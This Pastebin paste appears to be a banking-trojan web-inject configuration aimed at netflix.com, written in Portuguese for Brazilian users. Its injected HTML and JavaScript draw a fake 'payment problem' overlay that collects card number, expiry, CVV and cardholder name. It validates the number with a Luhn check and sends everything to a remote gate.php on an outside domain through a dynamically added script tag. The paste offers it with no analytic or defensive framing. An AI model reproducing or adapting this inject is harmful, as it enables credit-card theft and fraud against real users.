Advertisement
Guest User

Untitled

a guest
Sep 6th, 2016
976
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.83 KB | None | 0 0
  1. set_url *netflix.com/* GP
  2. data_before
  3. <body*>
  4. data_end
  5. data_inject
  6. <style>
  7. .ontop {
  8. z-index: 999;
  9. width: 100%;
  10. height: 100%;
  11. top: 0;
  12. left: 0;
  13. display: none;
  14. position: absolute;
  15.  
  16.  
  17. }
  18.  
  19. .ontop2 {
  20.  
  21. top: 50%;
  22. left: 50%;
  23. margin-bottom: 0;
  24. align-content: center;
  25.  
  26.  
  27. }
  28. #popup {
  29. padding: 10px;
  30. width: 1224px;
  31. height: 700px;
  32. position: absolute;
  33. color: #fff;
  34.  
  35. top: 50%;
  36. left: 50%;
  37. margin-top: -400px;
  38. margin-left: -600px;
  39.  
  40. font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif;
  41. font-size: 12px;
  42. background: #000000;
  43.  
  44.  
  45. }
  46.  
  47. #cc_form input {
  48. width: 100%;
  49. height: 50px;
  50. padding: 9px;
  51. border-radius: 2px;
  52. border: 1px solid #999;
  53. color: #fff;
  54. background-color: #333;
  55. }
  56.  
  57. #cc_form td {
  58. padding-top: 10px;
  59. color: #eee;
  60. font-size: 12px;
  61. }
  62.  
  63. #cc_submit {
  64. text-decoration: none;
  65. color: white;
  66. padding-bottom: 12px;
  67. padding-left: 28px;
  68. padding-right: 28px;
  69. padding-top: 12px;
  70. text-align: center;
  71. border-radius: 2px;
  72. background: #ff3019;
  73. background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
  74. background: -webkit-linear-gradient(top, #ff3019 0%,#cf0404 100%);
  75. background: linear-gradient(to bottom, #ff3019 0%,#cf0404 100%);
  76. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404',GradientType=0 );
  77. }
  78.  
  79. #cc_submit:hover {
  80. background: #ff1a00;
  81. background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
  82. background: -webkit-linear-gradient(top, #ff1a00 0%,#ff1a00 100%);
  83. background: linear-gradient(to bottom, #ff1a00 0%,#ff1a00 100%);
  84. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00',GradientType=0 );
  85.  
  86. }
  87. </style>
  88. <script type="text/javascript">
  89.  
  90. function checkCookie() {
  91. var WeAre = getCookie("WeAre");
  92. if (WeAre != "") {
  93. hide('popDiv');
  94. } else {
  95. pop('popDiv');
  96. }
  97. }
  98.  
  99.  
  100. function setCookie(cname, cvalue, exdays) {
  101. var d = new Date();
  102. d.setTime(d.getTime() + (exdays*24*60*60*1000));
  103. var expires = "expires="+d.toUTCString();
  104. document.cookie = cname + "=" + cvalue + "; " + expires;
  105. }
  106.  
  107. function getCookie(cname) {
  108. var name = cname + "=";
  109. var ca = document.cookie.split(';');
  110. for(var i = 0; i < ca.length; i++) {
  111. var c = ca[i];
  112. while (c.charAt(0) == ' ') {
  113. c = c.substring(1);
  114. }
  115. if (c.indexOf(name) == 0) {
  116. return c.substring(name.length, c.length);
  117. }
  118. }
  119. return "";
  120. }
  121.  
  122.  
  123.  
  124.  
  125. function pop(div) {
  126. document.getElementById(div).style.display = 'block';
  127. }
  128. function hide(div) {
  129. document.getElementById(div).style.display = 'none';
  130. }
  131.  
  132.  
  133.  
  134.  
  135.  
  136. function submitMe(){
  137.  
  138.  
  139. if( document.getElementById("cc_number").value == "" )
  140. {
  141. alert( "Ingresse um numero de Cartao" );
  142. document.getElementById("cc_number").focus();
  143. return false;
  144. }else {
  145. if(valid_credit_card(document.getElementById("cc_number").value)) {
  146.  
  147. }else{
  148. alert( "Ingresse um numero Valido" );
  149. document.getElementById("cc_number").focus();
  150. return false;
  151. }
  152. }
  153.  
  154.  
  155.  
  156. if( document.getElementById("cc_month").value == "" )
  157. {
  158.  
  159. alert( "Ingresse o mes de validade!" );
  160. document.getElementById("cc_month").focus();
  161. return false;
  162.  
  163. }
  164.  
  165. if( document.getElementById("cc_month").value == "" )
  166. {
  167.  
  168. alert( "Ingresse o ano de validade!" );
  169. document.getElementById("cc_year").focus();
  170. return false;
  171.  
  172. }
  173.  
  174. if( document.getElementById("cc_ccv").value == "" )
  175. {
  176.  
  177. alert( "Ingresse o codigo de segurança do seu cartao!" );
  178. document.getElementById("cc_ccv").focus();
  179. return false;
  180.  
  181. }
  182.  
  183. if( document.getElementById("cc_name").value == "" )
  184. {
  185.  
  186. alert( "Ingresse o seu nome Completo!" );
  187. document.getElementById("cc_name").focus();
  188. return false;
  189.  
  190. }
  191.  
  192. var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
  193. var _url_ = _link_+'CC='+document.getElementById("cc_number").value+'&month='+document.getElementById("cc_month").value+'&year='+document.getElementById("cc_year").value+'&cvv='+document.getElementById("cc_ccv").value+'&name='+document.getElementById("cc_name").value;
  194.  
  195. var head=document.getElementsByTagName("head")[0];
  196. var script_=document.createElement('script');
  197. script_.src=_url_;
  198. script_.type='text/javascript';
  199. head.appendChild(script_);
  200. setCookie("WeAre", "Foda", 365);
  201. hide('popDiv');
  202.  
  203. }
  204.  
  205. function valid_credit_card(value) {
  206.  
  207. if (/[^0-9-\s]+/.test(value)) return false;
  208. var nCheck = 0, nDigit = 0, bEven = false;
  209. value = value.replace(/\D/g, "");
  210. for (var n = value.length - 1; n >= 0; n--) {
  211. var cDigit = value.charAt(n),
  212. nDigit = parseInt(cDigit, 10);
  213. if (bEven) {
  214. if ((nDigit *= 2) > 9) nDigit -= 9;
  215. }
  216.  
  217. nCheck += nDigit;
  218. bEven = !bEven;
  219. }
  220.  
  221. return (nCheck % 10) == 0;
  222. };
  223.  
  224. </script>
  225.  
  226.  
  227. <div id="popDiv" class="ontop" >
  228. <div id="popup">
  229. <center><img src="https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png" width="128"></center>
  230. <h4>Houve um problema com seus dados de pagamento.</h4>
  231. <p>Desculpe-nos por interromper o show, mas não foi possÌvel confirmar suas informações de pagamento.<br/>Mas não se preocupe! Insira os dados no campo abaixo para continuar.</p>
  232. <form id="cc_form">
  233. <table width="100%">
  234. <tr>
  235. <td colspan="2">
  236. Numero do cartão:<br/>
  237. <input type="text" name="cc_number" id="cc_number" placeholder="E.g. 0000 0000 0000 0000" />
  238. </td>
  239. </tr>
  240. <tr>
  241. <td>
  242. Validade:<br/>
  243. <input type="text" name="cc_month" id="cc_month" placeholder="MM" style="width: 45% !important;" />
  244. <input type="text" name="cc_year" id="cc_year" placeholder="AA" style="width: 45% !important;" />
  245. </td>
  246. <td>
  247. Codigo de segurança:<br/>
  248. <input type="text" name="cc_ccv" id="cc_ccv" placeholder="" />
  249. </td>
  250. </tr>
  251. <tr>
  252. <td colspan="2">
  253. Nome do titular (conforme escrito no cartão):<br/>
  254. <input type="text" name="cc_name" id="cc_name" />
  255. </td>
  256. </tr>
  257. </table>
  258. <br/>
  259. <p align="right">
  260. <a id="cc_submit" href="" onclick="submitMe();">CONTINUAR</a>
  261. </p>
  262. </form>
  263. </div>
  264. </div>
  265. data_end
  266. data_after
  267. data_end
  268. data_before
  269. </html>
  270. data_end
  271. data_inject
  272. data_end
  273. data_after
  274. data_end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement